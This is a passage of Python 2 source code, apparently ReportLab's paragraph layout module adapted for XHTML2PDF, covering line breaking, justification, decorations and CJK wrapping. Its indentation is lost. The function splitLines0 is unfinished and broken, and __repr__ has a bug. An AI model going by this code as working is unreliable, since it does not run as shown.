u'\u2008', # PUNCTUATION SPACE
u'\u2009', # THIN SPACE
u'\u200A', # HAIR SPACE
u'\u200B', # ZERO WIDTH SPACE
u'\u2028', # LINE SEPARATOR
u'\u2029', # PARAGRAPH SEPARATOR
u'\u202F', # NARROW NO-BREAK SPACE
u'\u205F', # MEDIUM MATHEMATICAL SPACE
u'\u3000', # IDEOGRAPHIC SPACE
)))).split
def split(text, delim=None):
if type(text) is str:
text = text.decode('utf8')
if type(delim) is str:
delim = delim.decode('utf8')
elif delim is None and u'\xa0' in text:
return [uword.encode('utf8') for uword in _wsc_re_split(text)]
return [uword.encode('utf8') for uword in text.split(delim)]
def strip(text):
if type(text) is str:
text = text.decode('utf8')
return text.strip().encode('utf8')
class ParaLines(ABag):
"""
class ParaLines contains the broken into lines representation of Paragraphs
kind=0 Simple
fontName, fontSize, textColor apply to whole Paragraph
lines [(extraSpace1,words1),....,(extraspaceN,wordsN)]
kind==1 Complex
lines [FragLine1,...,FragLineN]
"""
class FragLine(ABag):
"""
class FragLine contains a styled line (ie a line with more than one style)::
extraSpace unused space for justification only
wordCount 1+spaces in line for justification purposes
words [ParaFrags] style text lumps to be concatenated together
fontSize maximum fontSize seen on the line; not used at present,
but could be used for line spacing.
"""
#our one and only parser
# XXXXX if the parser has any internal state using only one is probably a BAD idea!
_parser = ParaParser()
def _lineClean(L):
return join(filter(truth, split(strip(L))))
def cleanBlockQuotedText(text, joiner=' '):
"""This is an internal utility which takes triple-
quoted text form within the document and returns
(hopefully) the paragraph the user intended originally."""
L = filter(truth, map(_lineClean, split(text, '\n')))
return join(L, joiner)
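# e.g. cleanBlockQuotedText("  one\n   two  ") returns "one two"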
def setXPos(tx, dx):
if dx > 1e-6 or dx < -1e-6:
tx.setXPos(dx)
def _leftDrawParaLine(tx, offset, extraspace, words, last=0):
setXPos(tx, offset)
tx._textOut(join(words), 1)
setXPos(tx, -offset)
return offset
def _centerDrawParaLine(tx, offset, extraspace, words, last=0):
m = offset + 0.5 * extraspace
setXPos(tx, m)
tx._textOut(join(words), 1)
setXPos(tx, -m)
return m
def _rightDrawParaLine(tx, offset, extraspace, words, last=0):
m = offset + extraspace
setXPos(tx, m)
tx._textOut(join(words), 1)
setXPos(tx, -m)
return m
def _justifyDrawParaLine(tx, offset, extraspace, words, last=0):
setXPos(tx, offset)
text = join(words)
if last:
#last one, left align
tx._textOut(text, 1)
else:
nSpaces = len(words) - 1
if nSpaces:
tx.setWordSpace(extraspace / float(nSpaces))
tx._textOut(text, 1)
tx.setWordSpace(0)
else:
tx._textOut(text, 1)
setXPos(tx, -offset)
return offset
def imgVRange(h, va, fontSize):
"""
return bottom,top offsets relative to baseline(0)
"""
if va == 'baseline':
iyo = 0
elif va in ('text-top', 'top'):
iyo = fontSize - h
elif va == 'middle':
iyo = fontSize - (1.2 * fontSize + h) * 0.5
elif va in ('text-bottom', 'bottom'):
iyo = fontSize - 1.2 * fontSize
elif va == 'super':
iyo = 0.5 * fontSize
elif va == 'sub':
iyo = -0.5 * fontSize
elif hasattr(va, 'normalizedValue'):
iyo = va.normalizedValue(fontSize)
else:
iyo = va
return iyo, iyo + h
_56 = 5. / 6
_16 = 1. / 6
def _putFragLine(cur_x, tx, line):
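    # Renders one FragLine at the current text origin, advancing cur_x word by
    # word and recording span boundaries in tx.XtraState so that underline,
    # strike, background and link decorations can be drawn later in _do_post_text.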
xs = tx.XtraState
cur_y = xs.cur_y
x0 = tx._x0
autoLeading = xs.autoLeading
leading = xs.leading
cur_x += xs.leftIndent
dal = autoLeading in ('min', 'max')
if dal:
if autoLeading == 'max':
ascent = max(_56 * leading, line.ascent)
descent = max(_16 * leading, -line.descent)
else:
ascent = line.ascent
descent = -line.descent
leading = ascent + descent
if tx._leading != leading:
tx.setLeading(leading)
if dal:
olb = tx._olb
if olb is not None:
xcy = olb - ascent
if tx._oleading != leading:
cur_y += leading - tx._oleading
if abs(xcy - cur_y) > 1e-8:
cur_y = xcy
tx.setTextOrigin(x0, cur_y)
xs.cur_y = cur_y
tx._olb = cur_y - descent
tx._oleading = leading
# Letter spacing
if xs.style.letterSpacing != 'normal':
tx.setCharSpace(int(xs.style.letterSpacing))
ws = getattr(tx, '_wordSpace', 0)
nSpaces = 0
words = line.words
for f in words:
if hasattr(f, 'cbDefn'):
cbDefn = f.cbDefn
kind = cbDefn.kind
if kind == 'img':
#draw image cbDefn,cur_y,cur_x
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces * ws
tx._canvas.drawImage(cbDefn.image.getImage(), cur_x_s, cur_y + iy0, w, h, mask='auto')
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s - tx._x0)
elif kind == 'barcode':
barcode = cbDefn.barcode
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces * ws
barcode.draw(canvas=tx._canvas, xoffset=cur_x_s)
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s - tx._x0)
else:
name = cbDefn.name
if kind == 'anchor':
tx._canvas.bookmarkHorizontal(name, cur_x, cur_y + leading)
else:
func = getattr(tx._canvas, name, None)
if not func:
raise AttributeError("Missing %s callback attribute '%s'" % (kind, name))
func(tx._canvas, kind, cbDefn.label)
if f is words[-1]:
if not tx._fontname:
tx.setFont(xs.style.fontName, xs.style.fontSize)
tx._textOut('', 1)
elif kind == 'img':
tx._textOut('', 1)
else:
cur_x_s = cur_x + nSpaces * ws
if (tx._fontname, tx._fontsize) != (f.fontName, f.fontSize):
tx._setFont(f.fontName, f.fontSize)
if xs.textColor != f.textColor:
xs.textColor = f.textColor
tx.setFillColor(f.textColor)
if xs.rise != f.rise:
xs.rise = f.rise
tx.setRise(f.rise)
text = f.text
tx._textOut(text, f is words[-1]) # cheap textOut
# XXX Modified for XHTML2PDF
# Background colors (done like underline)
if hasattr(f, "backColor"):
if xs.backgroundColor != f.backColor or xs.backgroundFontSize != f.fontSize:
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
xs.background_x = cur_x_s
xs.backgroundColor = f.backColor
xs.backgroundFontSize = f.fontSize
# Underline
if not xs.underline and f.underline:
xs.underline = 1
xs.underline_x = cur_x_s
xs.underlineColor = f.textColor
elif xs.underline:
if not f.underline:
xs.underline = 0
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = None
elif xs.textColor != xs.underlineColor:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = xs.textColor
xs.underline_x = cur_x_s
# Strike
if not xs.strike and f.strike:
xs.strike = 1
xs.strike_x = cur_x_s
xs.strikeColor = f.textColor
# XXX Modified for XHTML2PDF
xs.strikeFontSize = f.fontSize
elif xs.strike:
if not f.strike:
xs.strike = 0
# XXX Modified for XHTML2PDF
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = None
xs.strikeFontSize = None
elif xs.textColor != xs.strikeColor:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = xs.textColor
xs.strikeFontSize = f.fontSize
xs.strike_x = cur_x_s
if f.link and not xs.link:
if not xs.link:
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
elif xs.link:
if not f.link:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
xs.link = None
xs.linkColor = None
elif f.link != xs.link or xs.textColor != xs.linkColor:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
txtlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
cur_x += txtlen
nSpaces += text.count(' ')
cur_x_s = cur_x + (nSpaces - 1) * ws
# XXX Modified for XHTML2PDF
# Underline
if xs.underline:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
# XXX Modified for XHTML2PDF
# Backcolor
if hasattr(f, "backColor"):
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
# XXX Modified for XHTML2PDF
# Strike
if xs.strike:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
if xs.link:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
if tx._x0 != x0:
setXPos(tx, x0 - tx._x0)
def _leftDrawParaLineX( tx, offset, line, last=0):
setXPos(tx, offset)
_putFragLine(offset, tx, line)
setXPos(tx, -offset)
def _centerDrawParaLineX( tx, offset, line, last=0):
m = offset + 0.5 * line.extraSpace
setXPos(tx, m)
_putFragLine(m, tx, line)
setXPos(tx, -m)
def _rightDrawParaLineX( tx, offset, line, last=0):
m = offset + line.extraSpace
setXPos(tx, m)
_putFragLine(m, tx, line)
setXPos(tx, -m)
def _justifyDrawParaLineX( tx, offset, line, last=0):
setXPos(tx, offset)
extraSpace = line.extraSpace
nSpaces = line.wordCount - 1
if last or not nSpaces or abs(extraSpace) <= 1e-8 or line.lineBreak:
_putFragLine(offset, tx, line) # no space modification
else:
tx.setWordSpace(extraSpace / float(nSpaces))
_putFragLine(offset, tx, line)
tx.setWordSpace(0)
setXPos(tx, -offset)
def _sameFrag(f, g):
"""
returns 1 if two ParaFrags map out the same
"""
if (hasattr(f, 'cbDefn') or hasattr(g, 'cbDefn')
or hasattr(f, 'lineBreak') or hasattr(g, 'lineBreak')): return 0
for a in ('fontName', 'fontSize', 'textColor', 'backColor', 'rise', 'underline', 'strike', 'link'):
if getattr(f, a, None) != getattr(g, a, None): return 0
return 1
def _getFragWords(frags):
"""
given a Parafrag list return a list of fragwords
[[size, (f00,w00), ..., (f0n,w0n)],....,[size, (fm0,wm0), ..., (f0n,wmn)]]
each pair f,w represents a style and some string
each sublist represents a word
"""
R = []
W = []
n = 0
hangingStrip = False
for f in frags:
text = f.text
# of paragraphs
if text != '':
if hangingStrip:
hangingStrip = False
text = text.lstrip()
S = split(text)
if S == []:
S = ['']
if W != [] and text[0] in whitespace:
W.insert(0, n)
R.append(W)
W = []
n = 0
for w in S[:-1]:
W.append((f, w))
n += stringWidth(w, f.fontName, f.fontSize)
W.insert(0, n)
R.append(W)
W = []
n = 0
w = S[-1]
W.append((f, w))
n += stringWidth(w, f.fontName, f.fontSize)
if text and text[-1] in whitespace:
W.insert(0, n)
R.append(W)
W = []
n = 0
elif hasattr(f, 'cbDefn'):
w = getattr(f.cbDefn, 'width', 0)
if w:
if W != []:
W.insert(0, n)
R.append(W)
W = []
n = 0
R.append([w, (f, '')])
else:
W.append((f, ''))
elif hasattr(f, 'lineBreak'):
#pass the frag through. The line breaker will scan for it.
if W != []:
W.insert(0, n)
R.append(W)
W = []
n = 0
R.append([0, (f, '')])
hangingStrip = True
if W != []:
W.insert(0, n)
R.append(W)
return R
def _split_blParaSimple(blPara, start, stop):
f = blPara.clone()
for a in ('lines', 'kind', 'text'):
if hasattr(f, a): delattr(f, a)
f.words = []
for l in blPara.lines[start:stop]:
for w in l[1]:
f.words.append(w)
return [f]
def _split_blParaHard(blPara, start, stop):
f = []
lines = blPara.lines[start:stop]
for l in lines:
for w in l.words:
f.append(w)
if l is not lines[-1]:
i = len(f) - 1
while i >= 0 and hasattr(f[i], 'cbDefn') and not getattr(f[i].cbDefn, 'width', 0): i -= 1
if i >= 0:
g = f[i]
if not g.text:
g.text = ' '
elif g.text[-1] != ' ':
g.text += ' '
return f
def _drawBullet(canvas, offset, cur_y, bulletText, style):
"""
draw a bullet text could be a simple string or a frag list
"""
tx2 = canvas.beginText(style.bulletIndent, cur_y + getattr(style, "bulletOffsetY", 0))
tx2.setFont(style.bulletFontName, style.bulletFontSize)
tx2.setFillColor(hasattr(style, 'bulletColor') and style.bulletColor or style.textColor)
if isinstance(bulletText, basestring):
tx2.textOut(bulletText)
else:
for f in bulletText:
if hasattr(f, "image"):
image = f.image
width = image.drawWidth
height = image.drawHeight
gap = style.bulletFontSize * 0.25
img = image.getImage()
# print style.bulletIndent, offset, width
canvas.drawImage(
img,
style.leftIndent - width - gap,
cur_y + getattr(style, "bulletOffsetY", 0),
width,
height)
else:
tx2.setFont(f.fontName, f.fontSize)
tx2.setFillColor(f.textColor)
tx2.textOut(f.text)
canvas.drawText(tx2)
#AR making definition lists a bit less ugly
#bulletEnd = tx2.getX()
bulletEnd = tx2.getX() + style.bulletFontSize * 0.6
offset = max(offset, bulletEnd - style.leftIndent)
return offset
def _handleBulletWidth(bulletText, style, maxWidths):
"""
work out bullet width and adjust maxWidths[0] if neccessary
"""
if bulletText:
if isinstance(bulletText, basestring):
bulletWidth = stringWidth(bulletText, style.bulletFontName, style.bulletFontSize)
else:
#it's a list of fragments
bulletWidth = 0
for f in bulletText:
bulletWidth = bulletWidth + stringWidth(f.text, f.fontName, f.fontSize)
bulletRight = style.bulletIndent + bulletWidth + 0.6 * style.bulletFontSize
indent = style.leftIndent + style.firstLineIndent
if bulletRight > indent:
#..then it overruns, and we have less space available on line 1
maxWidths[0] -= (bulletRight - indent)
def splitLines0(frags, widths):
"""
given a list of ParaFrags we return a list of ParaLines
each ParaLine has
1) ExtraSpace
2) blankCount
3) [textDefns....]
each text definition is a (ParaFrag, start, limit) triplet
"""
#initialise the algorithm
lines = []
lineNum = 0
maxW = widths[lineNum]
i = -1
l = len(frags)
lim = start = 0
while 1:
#find a non whitespace character
while i < l:
while start < lim and text[start] == ' ': start += 1
if start == lim:
i += 1
if i == l: break
start = 0
f = frags[i]
text = f.text
lim = len(text)
else:
break # we found one
if start == lim: break # if we didn't find one we are done
#start of a line
g = (None, None, None)
line = []
cLen = 0
nSpaces = 0
while cLen < maxW:
j = text.find(' ', start)
if j < 0:
                j = lim  # fixed: was a comparison (==) where an assignment was intended
w = stringWidth(text[start:j], f.fontName, f.fontSize)
cLen += w
if cLen > maxW and line != []:
cLen = cLen - w
#this is the end of the line
while g.text[lim] == ' ':
lim -= 1
nSpaces -= 1
break
if j < 0:
j = lim
if g[0] is f:
g[2] = j #extend
else:
g = (f, start, j)
line.append(g)
if j == lim:
i += 1
def _do_under_line(i, t_off, ws, tx, lm=-0.125):
y = tx.XtraState.cur_y - i * tx.XtraState.style.leading + lm * tx.XtraState.f.fontSize
textlen = tx._canvas.stringWidth(join(tx.XtraState.lines[i][1]), tx._fontname, tx._fontsize)
tx._canvas.line(t_off, y, t_off + textlen + ws, y)
_scheme_re = re.compile('^[a-zA-Z][-+a-zA-Z0-9]+$')
def _doLink(tx, link, rect):
if isinstance(link, unicode):
link = link.encode('utf8')
parts = link.split(':', 1)
scheme = len(parts) == 2 and parts[0].lower() or ''
if _scheme_re.match(scheme) and scheme != 'document':
kind = scheme.lower() == 'pdf' and 'GoToR' or 'URI'
if kind == 'GoToR': link = parts[1]
tx._canvas.linkURL(link, rect, relative=1, kind=kind)
else:
if link[0] == '#':
link = link[1:]
scheme = ''
tx._canvas.linkRect("", scheme != 'document' and link or parts[1], rect, relative=1)
def _do_link_line(i, t_off, ws, tx):
xs = tx.XtraState
leading = xs.style.leading
y = xs.cur_y - i * leading - xs.f.fontSize / 8.0 # 8.0 factor copied from para.py
text = join(xs.lines[i][1])
textlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
_doLink(tx, xs.link, (t_off, y, t_off + textlen + ws, y + leading))
# XXX Modified for XHTML2PDF
def _do_post_text(tx):
"""
Try to find out what the variables mean:
tx A structure containing more informations about paragraph ???
leading Height of lines
ff 1/8 of the font size
y0 The "baseline" postion ???
y 1/8 below the baseline
"""
xs = tx.XtraState
leading = xs.style.leading
autoLeading = xs.autoLeading
f = xs.f
if autoLeading == 'max':
# leading = max(leading, f.fontSize)
leading = max(leading, LEADING_FACTOR * f.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * f.fontSize
ff = 0.125 * f.fontSize
y0 = xs.cur_y
y = y0 - ff
# Background
for x1, x2, c, fs in xs.backgrounds:
inlineFF = fs * 0.125
gap = inlineFF * 1.25
tx._canvas.setFillColor(c)
tx._canvas.rect(x1, y - gap, x2 - x1, fs + 1, fill=1, stroke=0)
xs.backgrounds = []
xs.background = 0
xs.backgroundColor = None
xs.backgroundFontSize = None
# Underline
yUnderline = y0 - 1.5 * ff
tx._canvas.setLineWidth(ff * 0.75)
csc = None
for x1, x2, c in xs.underlines:
if c != csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.line(x1, yUnderline, x2, yUnderline)
xs.underlines = []
xs.underline = 0
xs.underlineColor = None
# Strike
for x1, x2, c, fs in xs.strikes:
inlineFF = fs * 0.125
ys = y0 + 2 * inlineFF
if c != csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.setLineWidth(inlineFF * 0.75)
tx._canvas.line(x1, ys, x2, ys)
xs.strikes = []
xs.strike = 0
xs.strikeColor = None
yl = y + leading
for x1, x2, link, c in xs.links:
# No automatic underlining for links, never!
_doLink(tx, link, (x1, y, x2, yl))
xs.links = []
xs.link = None
xs.linkColor = None
xs.cur_y -= leading
def textTransformFrags(frags, style):
tt = style.textTransform
if tt:
tt = tt.lower()
if tt == 'lowercase':
tt = unicode.lower
elif tt == 'uppercase':
tt = unicode.upper
elif tt == 'capitalize':
tt = unicode.title
elif tt == 'none':
return
else:
raise ValueError('ParaStyle.textTransform value %r is invalid' % style.textTransform)
n = len(frags)
if n == 1:
#single fragment the easy case
frags[0].text = tt(frags[0].text.decode('utf8')).encode('utf8')
elif tt is unicode.title:
pb = True
for f in frags:
t = f.text
if not t: continue
u = t.decode('utf8')
if u.startswith(u' ') or pb:
u = tt(u)
else:
i = u.find(u' ')
if i >= 0:
u = u[:i] + tt(u[i:])
pb = u.endswith(u' ')
f.text = u.encode('utf8')
else:
for f in frags:
t = f.text
if not t: continue
f.text = tt(t.decode('utf8')).encode('utf8')
class cjkU(unicode):
"""
simple class to hold the frag corresponding to a str
"""
def __new__(cls, value, frag, encoding):
self = unicode.__new__(cls, value)
self._frag = frag
if hasattr(frag, 'cbDefn'):
w = getattr(frag.cbDefn, 'width', 0)
self._width = w
else:
self._width = stringWidth(value, frag.fontName, frag.fontSize)
return self
frag = property(lambda self: self._frag)
width = property(lambda self: self._width)
def makeCJKParaLine(U, extraSpace, calcBounds):
words = []
CW = []
f0 = FragLine()
maxSize = maxAscent = minDescent = 0
for u in U:
f = u.frag
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
if not _sameFrag(f0, f):
f0 = f0.clone()
f0.text = u''.join(CW)
words.append(f0)
CW = []
f0 = f
CW.append(u)
if CW:
f0 = f0.clone()
f0.text = u''.join(CW)
words.append(f0)
return FragLine(kind=1, extraSpace=extraSpace, wordCount=1, words=words[1:], fontSize=maxSize, ascent=maxAscent,
descent=minDescent)
def cjkFragSplit(frags, maxWidths, calcBounds, encoding='utf8'):
"""
This attempts to be wordSplit for frags using the dumb algorithm
"""
from reportlab.rl_config import _FUZZ
U = [] # get a list of single glyphs with their widths etc etc
for f in frags:
text = f.text
if not isinstance(text, unicode):
text = text.decode(encoding)
if text:
U.extend([cjkU(t, f, encoding) for t in text])
else:
U.append(cjkU(text, f, encoding))
lines = []
widthUsed = lineStartPos = 0
maxWidth = maxWidths[0]
for i, u in enumerate(U):
w = u.width
widthUsed += w
lineBreak = hasattr(u.frag, 'lineBreak')
endLine = (widthUsed > maxWidth + _FUZZ and widthUsed > 0) or lineBreak
if endLine:
if lineBreak: continue
extraSpace = maxWidth - widthUsed + w
#This is the most important of the Japanese typography rules.
#if next character cannot start a line, wrap it up to this line so it hangs
#in the right margin. We won't do two or more though - that's unlikely and
#would result in growing ugliness.
nextChar = U[i]
if nextChar in ALL_CANNOT_START:
extraSpace -= w
i += 1
lines.append(makeCJKParaLine(U[lineStartPos:i], extraSpace, calcBounds))
try:
maxWidth = maxWidths[len(lines)]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
lineStartPos = i
widthUsed = w
i -= 1
#any characters left?
if widthUsed > 0:
lines.append(makeCJKParaLine(U[lineStartPos:], maxWidth - widthUsed, calcBounds))
return ParaLines(kind=1, lines=lines)
class Paragraph(Flowable):
"""
Paragraph(text, style, bulletText=None, caseSensitive=1)
text a string of stuff to go into the paragraph.
style is a style definition as in reportlab.lib.styles.
bulletText is an optional bullet defintion.
caseSensitive set this to 0 if you want the markup tags and their attributes to be case-insensitive.
This class is a flowable that can format a block of text
into a paragraph with a given style.
The paragraph Text can contain XML-like markup including the tags:
<b> ... </b> - bold
<i> ... </i> - italics
<u> ... </u> - underline
<strike> ... </strike> - strike through
<super> ... </super> - superscript
<sub> ... </sub> - subscript
<font name=fontfamily/fontname color=colorname size=float>
<onDraw name=callable label="a label">
<link>link text</link>
attributes of links
size/fontSize=num
name/face/fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
dest/destination/target/href/link=target
<a>anchor text</a>
attributes of anchors
fontSize=num
fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
href=href
<a name="anchorpoint"/>
<unichar name="unicode character name"/>
<unichar value="unicode code point"/>
<img src="path" width="1in" height="1in" valign="bottom"/>
The whole may be surrounded by <para> </para> tags
The <b> and <i> tags will work for the built-in fonts (Helvetica
/Times / Courier). For other fonts you need to register a family
of 4 fonts using reportlab.pdfbase.pdfmetrics.registerFont; then
use the addMapping function to tell the library that these 4 fonts
form a family e.g.
from reportlab.lib.fonts import addMapping
addMapping('Vera', 0, 0, 'Vera') #normal
addMapping('Vera', 0, 1, 'Vera-Italic') #italic
addMapping('Vera', 1, 0, 'Vera-Bold') #bold
addMapping('Vera', 1, 1, 'Vera-BoldItalic') #italic and bold
It will also be able to handle any MathML specified Greek characters.
"""
def __init__(self, text, style, bulletText=None, frags=None, caseSensitive=1, encoding='utf8'):
self.caseSensitive = caseSensitive
self.encoding = encoding
self._setup(text, style, bulletText, frags, cleanBlockQuotedText)
def __repr__(self):
n = self.__class__.__name__
L = [n + "("]
keys = self.__dict__.keys()
for k in keys:
v = getattr(self, k)
rk = repr(k)
rv = repr(v)
rk = " " + rk.replace("\n", "\n ")
rv = " " + rk.replace("\n", "\n ")
L.append(rk)
L.append(rv)
L.append(") #" + n)
return '\n'.join(L)
def _setup(self, text, style, bulletText, frags, cleaner):
if frags is None:
text = cleaner(text)
_parser.caseSensitive = self.caseSensitive
style, frags, bulletTextFrags = _parser.parse(text, style)
if frags is None:
raise ValueError("xml parser error (%s) in paragraph beginning\n'%s'" \
% (_parser.errors[0], text[:min(30, len(text))]))
textTransformFrags(frags, style)
if bulletTextFrags: bulletText = bulletTextFrags
#AR hack
self.text = text
self.frags = frags
self.style = style
self.bulletText = bulletText
self.debug = PARAGRAPH_DEBUG # turn this on to see a pretty one with all the margins etc.
def wrap(self, availWidth, availHeight):
if self.debug:
print id(self), "wrap"
try:
print repr(self.getPlainText()[:80])
except:
print "???"
# work out widths array for breaking
self.width = availWidth
style = self.style
leftIndent = style.leftIndent
first_line_width = availWidth - (leftIndent + style.firstLineIndent) - style.rightIndent
later_widths = availWidth - leftIndent - style.rightIndent
if style.wordWrap == 'CJK':
#use Asian text wrap algorithm to break characters
blPara = self.breakLinesCJK([first_line_width, later_widths])
else:
blPara = self.breakLines([first_line_width, later_widths])
self.blPara = blPara
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
leading = style.leading
if blPara.kind == 1 and autoLeading not in ('', 'off'):
height = 0
if autoLeading == 'max':
for l in blPara.lines:
height += max(l.ascent - l.descent, leading)
elif autoLeading == 'min':
for l in blPara.lines:
height += l.ascent - l.descent
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
if autoLeading == 'max':
leading = max(leading, LEADING_FACTOR * style.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * style.fontSize
height = len(blPara.lines) * leading
self.height = height
return self.width, height
def minWidth(self):
"""
Attempt to determine a minimum sensible width
"""
frags = self.frags
nFrags = len(frags)
if not nFrags: return 0
if nFrags == 1:
f = frags[0]
fS = f.fontSize
fN = f.fontName
words = hasattr(f, 'text') and split(f.text, ' ') or f.words
func = lambda w, fS=fS, fN=fN: stringWidth(w, fN, fS)
else:
words = _getFragWords(frags)
func = lambda x: x[0]
return max(map(func, words))
def _get_split_blParaFunc(self):
return self.blPara.kind == 0 and _split_blParaSimple or _split_blParaHard
def split(self, availWidth, availHeight):
if self.debug:
print id(self), "split"
if len(self.frags) <= 0: return []
#the split information is all inside self.blPara
if not hasattr(self, 'blPara'):
self.wrap(availWidth, availHeight)
blPara = self.blPara
style = self.style
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
leading = style.leading
lines = blPara.lines
if blPara.kind == 1 and autoLeading not in ('', 'off'):
s = height = 0
if autoLeading == 'max':
for i, l in enumerate(blPara.lines):
h = max(l.ascent - l.descent, leading)
n = height + h
if n > availHeight + 1e-8:
break
height = n
s = i + 1
elif autoLeading == 'min':
for i, l in enumerate(blPara.lines):
n = height + l.ascent - l.descent
if n > availHeight + 1e-8:
break
height = n
s = i + 1
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
l = leading
if autoLeading == 'max':
l = max(leading, LEADING_FACTOR * style.fontSize)
elif autoLeading == 'min':
l = LEADING_FACTOR * style.fontSize
s = int(availHeight / l)
height = s * l
n = len(lines)
        allowWidows = getattr(self, 'allowWidows', getattr(style, 'allowWidows', 1))  # fall back to the paragraph style's flag
        allowOrphans = getattr(self, 'allowOrphans', getattr(style, 'allowOrphans', 0))
if not allowOrphans:
if s <= 1: # orphan?
del self.blPara
return []
if n <= s: return [self]
if not allowWidows:
if n == s + 1: # widow?
if (allowOrphans and n == 3) or n > 3:
s -= 1 # give the widow some company
else:
del self.blPara # no room for adjustment; force the whole para onwards
return []
func = self._get_split_blParaFunc()
P1 = self.__class__(None, style, bulletText=self.bulletText, frags=func(blPara, 0, s))
#this is a major hack
P1.blPara = ParaLines(kind=1, lines=blPara.lines[0:s], aH=availHeight, aW=availWidth)
P1._JustifyLast = 1
P1._splitpara = 1
P1.height = height
P1.width = availWidth
if style.firstLineIndent != 0:
style = deepcopy(style)
style.firstLineIndent = 0
P2 = self.__class__(None, style, bulletText=None, frags=func(blPara, s, n))
for a in ('autoLeading', # possible attributes that might be directly on self.
):
if hasattr(self, a):
setattr(P1, a, getattr(self, a))
setattr(P2, a, getattr(self, a))
return [P1, P2]
def draw(self):
#call another method for historical reasons. Besides, I
#suspect I will be playing with alternate drawing routines
#so not doing it here makes it easier to switch.
self.drawPara(self.debug)
def breakLines(self, width):
"""
Returns a broken line structure. There are two cases
A) For the simple case of a single formatting input fragment the output is
A fragment specifier with
- kind = 0
- fontName, fontSize, leading, textColor
- lines= A list of lines
Each line has two items.
1. unused width in points
2. word list
B) When there is more than one input formatting fragment the output is
A fragment specifier with
- kind = 1
- lines= A list of fragments each having fields
- extraspace (needed for justified)
- fontSize
- words=word list
each word is itself a fragment with
various settings
This structure can be used to easily draw paragraphs with the various alignments.
You can supply either a single width or a list of widths; the latter will have its
last item repeated until necessary. A 2-element list is useful when there is a
different first line indent; a longer list could be created to facilitate custom wraps
around irregular objects.
"""
if self.debug:
print id(self), "breakLines"
if not isinstance(width, (tuple, list)):
maxWidths = [width]
else:
maxWidths = width
lines = []
lineno = 0
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
maxWidth = maxWidths[0]
self.height = 0
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
calcBounds = autoLeading not in ('', 'off')
frags = self.frags
nFrags = len(frags)
if nFrags == 1 and not hasattr(frags[0], 'cbDefn'):
f = frags[0]
fontSize = f.fontSize
fontName = f.fontName
ascent, descent = getAscentDescent(fontName, fontSize)
words = hasattr(f, 'text') and split(f.text, ' ') or f.words
spaceWidth = stringWidth(' ', fontName, fontSize, self.encoding)
cLine = []
currentWidth = -spaceWidth # hack to get around extra space for word 1
for word in words:
#this underscores my feeling that Unicode throughout would be easier!
wordWidth = stringWidth(word, fontName, fontSize, self.encoding)
newWidth = currentWidth + spaceWidth + wordWidth
if newWidth <= maxWidth or not len(cLine):
# fit one more on this line
cLine.append(word)
currentWidth = newWidth
else:
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append((maxWidth - currentWidth, cLine))
cLine = [word]
currentWidth = wordWidth
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
#deal with any leftovers on the final line
if cLine != []:
if currentWidth > self.width: self.width = currentWidth
lines.append((maxWidth - currentWidth, cLine))
return f.clone(kind=0, lines=lines, ascent=ascent, descent=descent, fontSize=fontSize)
elif nFrags <= 0:
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, ascent=style.fontSize, descent=-0.2 * style.fontSize,
lines=[])
else:
if hasattr(self, 'blPara') and getattr(self, '_splitpara', 0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return self.blPara
n = 0
words = []
for w in _getFragWords(frags):
f = w[-1][0]
fontName = f.fontName
fontSize = f.fontSize
